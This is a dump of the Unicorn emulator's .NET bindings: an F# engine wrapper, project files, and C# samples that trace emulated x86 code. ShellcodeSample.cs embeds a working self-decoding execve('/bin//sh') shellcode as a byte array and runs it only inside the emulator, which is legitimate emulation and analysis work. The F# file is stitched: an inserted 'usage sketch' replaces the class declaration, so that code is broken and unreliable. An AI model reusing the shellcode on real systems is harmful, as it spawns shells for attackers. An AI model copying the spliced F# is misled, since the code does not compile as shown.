type internal InHookInternal = delegate of IntPtr * Int32 * Int32 * IntPtr -> Int32

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal OutHookInternal = delegate of IntPtr * Int32 * Int32 * Int32 * IntPtr -> unit

[<UnmanagedFunctionPointer(CallingConvention.Cdecl)>]
type internal SyscallHookInternal = delegate of IntPtr * IntPtr -> unit
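// ---- usage sketch (not part of the repository) ------------------------------
// The *HookInternal delegates above are the unmanaged shape of the hooks: the
// Unicorn class below wraps each managed callback in a trampoline, obtains a
// Cdecl function pointer for it with Marshal.GetFunctionPointerForDelegate,
// and keeps the delegate alive in a callback list so the GC cannot collect it
// while native code still holds the pointer. A sketch of the resulting public
// API, assuming the UC_ARCH_X86 and UC_MODE_32 constants from the Common
// module of these bindings:
open UnicornEngine
open UnicornEngine.Const

let traceNops() =
    let uc = new Unicorn(Common.UC_ARCH_X86, Common.UC_MODE_32)
    uc.MemMap(0x1000L, 0x1000L, Common.UC_PROT_ALL)
    uc.MemWrite(0x1000L, [| 0x90uy; 0x90uy |])          // nop; nop
    let hook = new CodeHook(fun _ addr size _ ->
        printfn "executing 0x%x (%d bytes)" addr size)
    uc.AddCodeHook(hook, 0x1000L, 0x1002L)
    uc.EmuStart(0x1000L, 0x1002L, 0L, 0L)
    uc.Close()
// -----------------------------------------------------------------------------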
IBinding) = // hook callback list let _codeHooks = new List<(CodeHook * (UIntPtr * Object * Object))>() let _blockHooks = new List<(BlockHook * (UIntPtr * Object * Object))>() let _interruptHooks = new List<(InterruptHook * (UIntPtr * Object * Object))>() let _memReadHooks = new List<(MemReadHook * (UIntPtr * Object * Object))>() let _memWriteHooks = new List<(MemWriteHook * (UIntPtr * Object * Object))>() let _memEventHooks = new Dictionary>() let _inHooks = new List<(InHook * (UIntPtr * Object * Object))>() let _outHooks = new List<(OutHook * (UIntPtr * Object * Object))>() let _syscallHooks = new List<(SyscallHook * (UIntPtr * Object * Object))>() let _disposablePointers = new List() let _eventMemMap = [ (UC_HOOK_MEM_READ_UNMAPPED, UC_MEM_READ_UNMAPPED) (UC_HOOK_MEM_WRITE_UNMAPPED, UC_MEM_WRITE_UNMAPPED) (UC_HOOK_MEM_FETCH_UNMAPPED, UC_MEM_FETCH_UNMAPPED) (UC_HOOK_MEM_READ_PROT, UC_MEM_READ_PROT) (UC_HOOK_MEM_WRITE_PROT, UC_MEM_WRITE_PROT) (UC_HOOK_MEM_FETCH_PROT, UC_MEM_FETCH_PROT) ] |> dict let mutable _eng = [|UIntPtr.Zero|] let strError(errorNo: Int32) = let errorStringPointer = binding.Strerror(errorNo) Marshal.PtrToStringAnsi(errorStringPointer) let checkResult(errorCode: Int32) = // return the exception instead of raising it in order to have a more meaningful stack trace if errorCode <> Common.UC_ERR_OK then let errorMessage = strError(errorCode) Some <| UnicornEngineException(errorCode, errorMessage) else None let hookDel(callbacks: List<'a * (UIntPtr * Object * Object)>) (callback: 'a)= match callbacks |> Seq.tryFind(fun item -> match item with | (c, _) -> c = callback) with | Some(item) -> let (hh, _, _) = snd item match binding.HookDel(_eng.[0], hh) |> checkResult with | Some e -> raise e | None -> callbacks.Remove(item) |> ignore | None -> () let allocate(size: Int32) = let mem = Marshal.AllocHGlobal(size) _disposablePointers.Add(mem) mem.ToPointer() do // initialize event list _eventMemMap |> Seq.map(fun kv -> kv.Key) |> Seq.iter (fun eventType -> _memEventHooks.Add(eventType, new List())) // init engine _eng <- [|new UIntPtr(allocate(IntPtr.Size))|] let err = binding.UcOpen(uint32 arch, uint32 mode, _eng) if err <> Common.UC_ERR_OK then raise(ApplicationException(String.Format("Unable to open the Unicorn Engine. 
Error: {0}", err))) new(arch, mode) = new Unicorn(arch, mode, BindingFactory.getDefault()) member this.MemMap(address: Int64, size: Int64, perm: Int32) = let size = new UIntPtr(uint64 size) match binding.MemMap(_eng.[0], uint64 address, size, uint32 perm) |> checkResult with | Some e -> raise e | None -> () member this.MemMapPtr(address: Int64, size: Int64, perm: Int32, ptr: IntPtr) = let size = new UIntPtr(uint64 size) let ptr = new UIntPtr(ptr.ToPointer()) match binding.MemMapPtr(_eng.[0], uint64 address, size, uint32 perm, ptr) |> checkResult with | Some e -> raise e | None -> () member this.MemUnmap(address: Int64, size: Int64) = let size = new UIntPtr(uint64 size) match binding.MemUnmap(_eng.[0], uint64 address, size) |> checkResult with | Some e -> raise e | None -> () member this.MemProtect(address: Int64, size: Int64, ?perm: Int32) = let size = new UIntPtr(uint64 size) let perm = defaultArg perm Common.UC_PROT_ALL match binding.MemProtect(_eng.[0], uint64 address, size, uint32 perm) |> checkResult with | Some e -> raise e | None -> () member this.MemWrite(address: Int64, value: Byte array) = match binding.MemWrite(_eng.[0], uint64 address, value, new UIntPtr(uint32 value.Length)) |> checkResult with | Some e -> raise e | None -> () member this.MemRead(address: Int64, memValue: Byte array) = match binding.MemRead(_eng.[0], uint64 address, memValue, new UIntPtr(uint32 memValue.Length)) |> checkResult with | Some e -> raise e | None -> () member this.RegWrite(regId: Int32, value: Byte array) = match binding.RegWrite(_eng.[0], regId, value) |> checkResult with | Some e -> raise e | None -> () member this.RegWrite(regId: Int32, value: Int64) = this.RegWrite(regId, int64ToBytes value) member this.RegRead(regId: Int32, regValue: Byte array) = match binding.RegRead(_eng.[0], regId, regValue) |> checkResult with | Some e -> raise e | None -> () member this.RegRead(regId: Int32) = let buffer = Array.zeroCreate 8 this.RegRead(regId, buffer) bytesToInt64 buffer member this.EmuStart(beginAddr: Int64, untilAddr: Int64, timeout: Int64, count: Int64) = match binding.EmuStart(_eng.[0], uint64 beginAddr, uint64 untilAddr, uint64 timeout, uint64 count) |> checkResult with | Some e -> raise e | None -> () member this.EmuStop() = match binding.EmuStop(_eng.[0]) |> checkResult with | Some e -> raise e | None -> () member this.Close() = match binding.Close(_eng.[0]) |> checkResult with | Some e -> raise e | None -> () member this.ArchSupported(arch: Int32) = binding.ArchSupported(arch) member this.ErrNo() = binding.Errono(_eng.[0]) member this.AddCodeHook(callback: CodeHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = callback.Invoke(this, addr, size, userData) let codeHookInternal = new CodeHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(codeHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_CODE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _codeHooks.Add(callback, (hh, userData, codeHookInternal)) member this.AddCodeHook(callback: CodeHook, beginAddr: Int64, endAddr: Int64) = this.AddCodeHook(callback, null, beginAddr, endAddr) member this.HookDel(callback: CodeHook) = hookDel _codeHooks callback member this.AddBlockHook(callback: BlockHook, userData: Object, beginAddr: Int64, 
endAddr: Int64) = let trampoline(u: IntPtr) (addr: Int64) (size: Int32) (user: IntPtr) = callback.Invoke(this, addr, size, userData) let blockHookInternal = new BlockHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(blockHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_BLOCK, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _blockHooks.Add(callback, (hh, userData, blockHookInternal)) member this.HookDel(callback: BlockHook) = hookDel _blockHooks callback member this.AddInterruptHook(callback: InterruptHook, userData: Object, hookBegin: UInt64, hookEnd : UInt64) = let trampoline(u: IntPtr) (intNumber: Int32) (user: IntPtr) = callback.Invoke(this, intNumber, userData) let interruptHookInternal = new InterruptHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(interruptHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_INTR, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, hookBegin, hookEnd) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _interruptHooks.Add(callback, (hh, userData, interruptHookInternal)) member this.AddInterruptHook(callback: InterruptHook) = this.AddInterruptHook(callback, null, uint64 1, uint64 0) member this.HookDel(callback: InterruptHook) = hookDel _interruptHooks callback member this.AddMemReadHook(callback: MemReadHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (_eventType: Int32) (addr: Int64) (size: Int32) (user: IntPtr) = callback.Invoke(this, addr, size, userData) let memReadHookInternal = new MemReadHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(memReadHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_READ, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _memReadHooks.Add(callback, (hh, userData, memReadHookInternal)) member this.HookDel(callback: MemReadHook) = hookDel _memReadHooks callback member this.AddMemWriteHook(callback: MemWriteHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (_eventType: Int32) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = callback.Invoke(this, addr, size, value, userData) let memWriteHookInternal = new MemWriteHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(memWriteHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_WRITE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _memWriteHooks.Add(callback, (hh, userData, memWriteHookInternal)) member this.HookDel(callback: MemWriteHook) = hookDel _memWriteHooks callback member this.AddEventMemHook(callback: EventMemHook, eventType: Int32, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (eventType: Int32) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = callback.Invoke(this, eventType, 
addr, size, value, userData) // register the event if not already done _memEventHooks.Keys |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) |> Seq.iter(fun eventFlag -> let memEventHookInternal = new EventMemHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(memEventHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, eventFlag, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _memEventHooks.[eventFlag].Add((callback, (hh, userData, memEventHookInternal))) ) member this.AddEventMemHook(callback: EventMemHook, eventType: Int32, userData: Object) = this.AddEventMemHook(callback, eventType, userData, 1, 0) member this.AddEventMemHook(callback: EventMemHook, eventType: Int32) = this.AddEventMemHook(callback, eventType, null) member this.HookDel(callback: EventMemHook) = _memEventHooks.Keys |> Seq.iter(fun eventFlag -> hookDel _memEventHooks.[eventFlag] callback) member this.AddInHook(callback: InHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (port: Int32) (size: Int32) (user: IntPtr) = callback.Invoke(this, port, size, userData) let inHookInternal = new InHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(inHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr, X86.UC_X86_INS_IN) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _inHooks.Add(callback, (hh, userData, inHookInternal)) member this.AddInHook(callback: InHook, userData: Object) = this.AddInHook(callback, userData, 1, 0) member this.AddInHook(callback: InHook) = this.AddInHook(callback, null) member this.HookDel(callback: InHook) = hookDel _inHooks callback member this.AddOutHook(callback: OutHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (port: Int32) (size: Int32) (value: Int32) (user: IntPtr) = callback.Invoke(this, port, size, value, userData) let outHookInternal = new OutHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(outHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr, X86.UC_X86_INS_OUT) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _outHooks.Add(callback, (hh, userData, outHookInternal)) member this.AddOutHook(callback: OutHook, userData: Object) = this.AddOutHook(callback, userData, 1, 0) member this.AddOutHook(callback: OutHook) = this.AddOutHook(callback, null) member this.HookDel(callback: OutHook) = hookDel _outHooks callback member this.AddSyscallHook(callback: SyscallHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (user: IntPtr) = callback.Invoke(this, userData) let syscallHookInternal = new SyscallHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(syscallHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr, 
X86.UC_X86_INS_SYSCALL) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _syscallHooks.Add(callback, (hh, userData, syscallHookInternal)) member this.AddSyscallHook(callback: SyscallHook, userData: Object) = this.AddSyscallHook(callback, userData, 1, 0) member this.AddSyscallHook(callback: SyscallHook) = this.AddSyscallHook(callback, null) member this.HookDel(callback: SyscallHook) = hookDel _syscallHooks callback member this.Version() = let (major, minor) = (new UIntPtr(), new UIntPtr()) let combined = binding.Version(major, minor) (major.ToUInt32(), minor.ToUInt32(), combined) abstract Dispose : Boolean -> unit default this.Dispose(disposing: Boolean) = if (disposing) then // free managed resources, this is the default dispose implementation pattern () _disposablePointers |> Seq.filter(fun pointer -> pointer <> IntPtr.Zero) |> Seq.iter Marshal.FreeHGlobal _disposablePointers.Clear() member this.Dispose() = this.Dispose(true) GC.SuppressFinalize(this) override this.Finalize() = this.Dispose(false) interface IDisposable with member this.Dispose() = this.Dispose() unicorn-2.1.1/bindings/dotnet/UnicornEngine/UnicornEngine.fsproj000066400000000000000000000035121467524106700250320ustar00rootroot00000000000000 net6.0 UnicornEngine.Unicorn UnicornEngine Copyright © Antonio Parata 2016 https://github.com/unicorn-engine/unicorn .NET bindings for unicorn 2.1.1 $(VersionSuffix) 0c21f1c1-2725-4a46-9022-1905f85822a5 true true 3 none unicorn-2.1.1/bindings/dotnet/UnicornEngine/UnicornEngineException.fs000066400000000000000000000002521467524106700260140ustar00rootroot00000000000000namespace UnicornEngine open System type UnicornEngineException(errNo: Int32, msg: String) = inherit ApplicationException(msg) member this.ErrorNo = errNo unicorn-2.1.1/bindings/dotnet/UnicornSamples/000077500000000000000000000000001467524106700212405ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/UnicornSamples/Program.cs000066400000000000000000000011211467524106700231710ustar00rootroot00000000000000using System; namespace UnicornSamples { internal static class Program { private static void Main(string[] args) { // X86 tests 32bit X86Sample32.X86Code32(); X86Sample32.X86Code32InvalidMemRead(); X86Sample32.X86Code32InvalidMemWriteWithRuntimeFix(); X86Sample32.X86Code32InOut(); // Run all shellcode tests ShellcodeSample.X86Code32Self(); ShellcodeSample.X86Code32(); Console.Write("Tests completed"); Console.ReadLine(); } } } unicorn-2.1.1/bindings/dotnet/UnicornSamples/ShellcodeSample.cs000066400000000000000000000145041467524106700246370ustar00rootroot00000000000000using Gee.External.Capstone; using Gee.External.Capstone.X86; using System; using System.Diagnostics; using System.Text; using UnicornEngine; using UnicornEngine.Const; namespace UnicornSamples { internal static class ShellcodeSample { private const long ADDRESS = 0x1000000; public static void X86Code32Self() { byte[] X86_CODE32_SELF = { 0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, 0x89, 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, 0xff, 0x31, 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 }; Run(X86_CODE32_SELF); } public static void X86Code32() { byte[] X86_CODE32 = { 0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0, 0x04, 0xb3, 
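            // A hedged, hand-disassembled reading of this payload: after the
            // leading jmp/call-pop pair, the bytes zero EAX/EBX/EDX/ECX, set
            // AL = 4 (sys_write) and BL = 1 (stdout), pop the address of the
            // trailing "hello" bytes into ECX, set DL = 5 and trap with
            // int 0x80, i.e. write(1, "hello", 5); a second int 0x80 with
            // AL = 1 then performs sys_exit.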
0x01, 0x59, 0xb2, 0x05, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, 0x6c, 0x6c, 0x6f }; Run(X86_CODE32); } private static void Run(byte[] code) { Console.WriteLine(); var stackTrace = new StackTrace(); var stackFrame = stackTrace.GetFrames()[1]; var methodName = stackFrame.GetMethod().Name; Console.WriteLine($"*** Start: {methodName}"); RunTest(code, ADDRESS); Console.WriteLine($"*** End: {methodName}"); Console.WriteLine(); } private static void RunTest(byte[] code, long address) { try { using (var u = new Unicorn(Common.UC_ARCH_X86, Common.UC_MODE_32)) using(var disassembler = CapstoneDisassembler.CreateX86Disassembler(X86DisassembleMode.Bit32)) { Console.WriteLine($"Unicorn version: {u.Version()}"); // map 2MB of memory for this emulation u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); // write machine code to be emulated to memory u.MemWrite(address, code); // initialize machine registers u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); var regv = new byte[4]; u.RegRead(X86.UC_X86_REG_ESP, regv); // tracing all instructions by having @begin > @end u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); // handle interrupt ourself u.AddInterruptHook(InterruptHookCallback); // handle SYSCALL u.AddSyscallHook(SyscallHookCallback); Console.WriteLine(">>> Start tracing code"); // emulate machine code in infinite time u.EmuStart(address, address + code.Length, 0u, 0u); Console.WriteLine(">>> Emulation Done!"); } } catch (UnicornEngineException ex) { Console.Error.WriteLine("Emulation FAILED! " + ex.Message); } } private static void CodeHookCallback( CapstoneX86Disassembler disassembler, Unicorn u, long addr, int size, object userData) { Console.Write($"[+] 0x{addr:X}: "); var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var effectiveSize = Math.Min(16, size); var tmp = new byte[effectiveSize]; u.MemRead(addr, tmp); var sb = new StringBuilder(); foreach (var t in tmp) { sb.AppendFormat($"{(0xFF & t):X} "); } Console.Write($"{sb,-20}"); Console.WriteLine(Utils.Disassemble(disassembler, tmp)); } private static void SyscallHookCallback(Unicorn u, object userData) { var eaxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); var eax = Utils.ToInt(eaxBuffer); Console.WriteLine($"[!] Syscall EAX = 0x{eax:X}"); u.EmuStop(); } private static void InterruptHookCallback(Unicorn u, int intNumber, object userData) { // only handle Linux syscall if (intNumber != 0x80) { return; } var eaxBuffer = new byte[4]; var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var eax = Utils.ToInt(eaxBuffer); var eip = Utils.ToInt(eipBuffer); switch (eax) { default: Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, EAX=0x{eax:X}"); break; case 1: // sys_exit Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, SYS_EXIT"); u.EmuStop(); break; case 4: // sys_write // ECX = buffer address var ecxBuffer = new byte[4]; // EDX = buffer size var edxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); var ecx = Utils.ToInt(ecxBuffer); var edx = Utils.ToInt(edxBuffer); // read the buffer in var size = Math.Min(256, edx); var buffer = new byte[size]; u.MemRead(ecx, buffer); var content = Encoding.Default.GetString(buffer); Console.WriteLine($"[!] Interrupt 0x{eip:X}: num {ecx:X}, SYS_WRITE.
buffer = 0x{edx:X}, size = {size:X}, content = '{content}'"); break; } } } } unicorn-2.1.1/bindings/dotnet/UnicornSamples/UnicornSamples.csproj000066400000000000000000000017601467524106700254300ustar00rootroot00000000000000 net6.0 Exe UnicornSamples UnicornSamples Copyright © Antonio Parata 2016 https://github.com/unicorn-engine/unicorn 2.1.1 {B80B5987-1E24-4309-8BF9-C4F91270F21C} true prompt 4 {0c21f1c1-2725-4a46-9022-1905f85822a5} UnicornEngine unicorn-2.1.1/bindings/dotnet/UnicornSamples/Utils.cs000066400000000000000000000022611467524106700226700ustar00rootroot00000000000000using Gee.External.Capstone.X86; using System; using System.Text; namespace UnicornSamples { internal static class Utils { public static long ToInt(byte[] val) { ulong res = 0; for (var i = 0; i < val.Length; i++) { var v = val[i] & 0xFF; res += (ulong)(v << (i * 8)); } return (long)res; } public static byte[] Int64ToBytes(long intVal) { var res = new byte[8]; var uval = (ulong)intVal; for (var i = 0; i < res.Length; i++) { res[i] = (byte)(uval & 0xff); uval = uval >> 8; } return res; } public static string Disassemble(CapstoneX86Disassembler disassembler, byte[] code) { var sb = new StringBuilder(); var instructions = disassembler.Disassemble(code); foreach (var instruction in instructions) { sb.AppendFormat($"{instruction.Mnemonic} {instruction.Operand}{Environment.NewLine}"); } return sb.ToString().Trim(); } } } unicorn-2.1.1/bindings/dotnet/UnicornSamples/X86Sample32.cs000066400000000000000000000241261467524106700234700ustar00rootroot00000000000000using Gee.External.Capstone; using Gee.External.Capstone.X86; using System; using System.Diagnostics; using System.Text; using UnicornEngine; using UnicornEngine.Const; namespace UnicornSamples { internal static class X86Sample32 { private const long ADDRESS = 0x1000000; public static void X86Code32() { byte[] X86_CODE32 = { // INC ecx; DEC edx 0x41, 0x4a }; Run(X86_CODE32); } public static void X86Code32InvalidMemRead() { byte[] X86_CODE32_MEM_READ = { // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx 0x8B, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a }; Run(X86_CODE32_MEM_READ); } public static void X86Code32InvalidMemWriteWithRuntimeFix() { byte[] X86_CODE32_MEM_WRITE = { // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx 0x89, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a }; Run(X86_CODE32_MEM_WRITE); } public static void X86Code32InOut() { byte[] X86_CODE32_INOUT = { // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx 0x41, 0xE4, 0x3F, 0x4a, 0xE6, 0x46, 0x43 }; Run(X86_CODE32_INOUT); } private static void Run(byte[] code, bool raiseException = false) { Console.WriteLine(); var stackTrace = new StackTrace(); var stackFrame = stackTrace.GetFrames()[1]; var methodName = stackFrame.GetMethod()?.Name; Console.WriteLine($"*** Start: {methodName}"); Exception e = null; try { RunTest(code, ADDRESS, Common.UC_MODE_32); } catch (UnicornEngineException ex) { e = ex; } if (!raiseException && e != null) { Console.Error.WriteLine("Emulation FAILED! 
" + e.Message); } Console.WriteLine("*** End: " + methodName); Console.WriteLine(); } private static void RunTest(byte[] code, long address, int mode) { using var u = new Unicorn(Common.UC_ARCH_X86, mode); using var disassembler = CapstoneDisassembler.CreateX86Disassembler(X86DisassembleMode.Bit32); Console.WriteLine($"Unicorn version: {u.Version()}"); // map 2MB of memory for this emulation u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); // initialize machine registers u.RegWrite(X86.UC_X86_REG_EAX, 0x1234); u.RegWrite(X86.UC_X86_REG_ECX, 0x1234); u.RegWrite(X86.UC_X86_REG_EDX, 0x7890); // write machine code to be emulated to memory u.MemWrite(address, code); // initialize machine registers u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); // handle IN & OUT instruction u.AddInHook(InHookCallback); u.AddOutHook(OutHookCallback); // tracing all instructions by having @begin > @end u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); // handle interrupt ourself u.AddInterruptHook(InterruptHookCallback); // handle SYSCALL u.AddSyscallHook(SyscallHookCallback); // intercept invalid memory events u.AddEventMemHook(MemMapHookCallback, Common.UC_HOOK_MEM_READ_UNMAPPED | Common.UC_HOOK_MEM_WRITE_UNMAPPED); Console.WriteLine(">>> Start tracing code"); // emulate machine code in infinite time u.EmuStart(address, address + code.Length, 0u, 0u); // print registers var ecx = u.RegRead(X86.UC_X86_REG_ECX); var edx = u.RegRead(X86.UC_X86_REG_EDX); var eax = u.RegRead(X86.UC_X86_REG_EAX); Console.WriteLine($"[!] EAX = {eax:X}"); Console.WriteLine($"[!] ECX = {ecx:X}"); Console.WriteLine($"[!] EDX = {edx:X}"); Console.WriteLine(">>> Emulation Done!"); } private static int InHookCallback(Unicorn u, int port, int size, object userData) { var eip = u.RegRead(X86.UC_X86_REG_EIP); Console.WriteLine($"[!] Reading from port 0x{port:X}, size: {size:X}, address: 0x{eip:X}"); var res = size switch { 1 => // read 1 byte to AL 0xf1, 2 => // read 2 byte to AX 0xf2, 4 => // read 4 byte to EAX 0xf4, _ => 0 }; Console.WriteLine($"[!] Return value: {res:X}"); return res; } private static void OutHookCallback(Unicorn u, int port, int size, int value, object userData) { var eip = u.RegRead(X86.UC_X86_REG_EIP); Console.WriteLine($"[!] Writing to port 0x{port:X}, size: {size:X}, value: 0x{value:X}, address: 0x{eip:X}"); // confirm that value is indeed the value of AL/ AX / EAX var v = 0L; var regName = string.Empty; switch (size) { case 1: // read 1 byte in AL v = u.RegRead(X86.UC_X86_REG_AL); regName = "AL"; break; case 2: // read 2 byte in AX v = u.RegRead(X86.UC_X86_REG_AX); regName = "AX"; break; case 4: // read 4 byte in EAX v = u.RegRead(X86.UC_X86_REG_EAX); regName = "EAX"; break; } Console.WriteLine("[!] Register {0}: {1:X}", regName, v); } private static bool MemMapHookCallback(Unicorn u, int eventType, long address, int size, long value, object userData) { if (eventType != Common.UC_MEM_WRITE_UNMAPPED) return false; Console.WriteLine($"[!] Missing memory is being WRITE at 0x{address:X}, data size = {size:X}, data value = 0x{value:X}. 
Map memory."); u.MemMap(0xaaaa0000, 2 * 1024 * 1024, Common.UC_PROT_ALL); return true; } private static void CodeHookCallback1( CapstoneX86Disassembler disassembler, Unicorn u, long addr, int size, object userData) { Console.Write($"[+] 0x{addr:X}: "); var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var effectiveSize = Math.Min(16, size); var tmp = new byte[effectiveSize]; u.MemRead(addr, tmp); var sb = new StringBuilder(); foreach (var t in tmp) { sb.AppendFormat($"{(0xFF & t):X} "); } Console.Write($"{sb,-20}"); Console.WriteLine(Utils.Disassemble(disassembler, tmp)); } private static void CodeHookCallback( CapstoneX86Disassembler disassembler, Unicorn u, long addr, int size, object userData) { Console.Write($"[+] 0x{addr:X}: "); var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var effectiveSize = Math.Min(16, size); var tmp = new byte[effectiveSize]; u.MemRead(addr, tmp); var sb = new StringBuilder(); foreach (var t in tmp) { sb.AppendFormat($"{(0xFF & t):X} "); } Console.Write($"{sb,-20}"); Console.WriteLine(Utils.Disassemble(disassembler, tmp)); } private static void SyscallHookCallback(Unicorn u, object userData) { var eaxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); var eax = Utils.ToInt(eaxBuffer); Console.WriteLine($"[!] Syscall EAX = 0x{eax:X}"); u.EmuStop(); } private static void InterruptHookCallback(Unicorn u, int intNumber, object userData) { // only handle Linux syscall if (intNumber != 0x80) { return; } var eaxBuffer = new byte[4]; var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var eax = Utils.ToInt(eaxBuffer); var eip = Utils.ToInt(eipBuffer); switch (eax) { default: Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, EAX=0x{eax:X}"); break; case 1: // sys_exit Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, SYS_EXIT"); u.EmuStop(); break; case 4: // sys_write // ECX = buffer address var ecxBuffer = new byte[4]; // 